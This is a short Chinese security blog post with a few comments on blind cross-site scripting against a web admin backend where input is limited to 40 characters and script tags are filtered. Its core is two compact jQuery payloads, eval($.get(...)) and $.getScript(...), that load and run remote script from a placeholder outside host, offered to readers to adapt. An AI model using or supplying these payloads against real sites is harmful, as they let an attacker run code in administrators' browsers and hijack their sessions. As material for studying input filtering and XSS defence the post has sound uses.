XSS盲打思路1：jQuery我爱你

2013/9/28 by 余弦·27,995 views | 5 Comments

后台灰盒+exp被限制40字符+script等标签被过滤。

很多人祭出0day bypass，没必要。先分析场景。最爽的是我看到场景使用了jquery，在昨天的一个攻击场景下，我推测那后台用jquery是必然的。

于是简短强悍的exp如：
1. eval($.get('//xxxx.com')) 2. $.getScript('//xxx.com') // 这个最牛逼，我当时没意识到，pw实战发现

思想是：攻击得原生态，依赖场景，这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。

大家举一反三吧。

About 余弦

一个符号而已 View all posts by 余弦 →

5 comments

ChiChou说道：

2013/9/28 11:13

……这个本质就是把createElement / appendChild 包装了一下，节省EXP长度嘛

登录以回复
1. root说道：
  
  2013/9/28 12:24
  
  你真聪明
  
  登录以回复
t说道：

2014/7/26 20:56

test

登录以回复
t说道：

2014/7/26 20:59

test

登录以回复
t说道：

2014/7/26 21:00

test

登录以回复

发表评论取消回复

要发表评论，您必须先登录。

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据。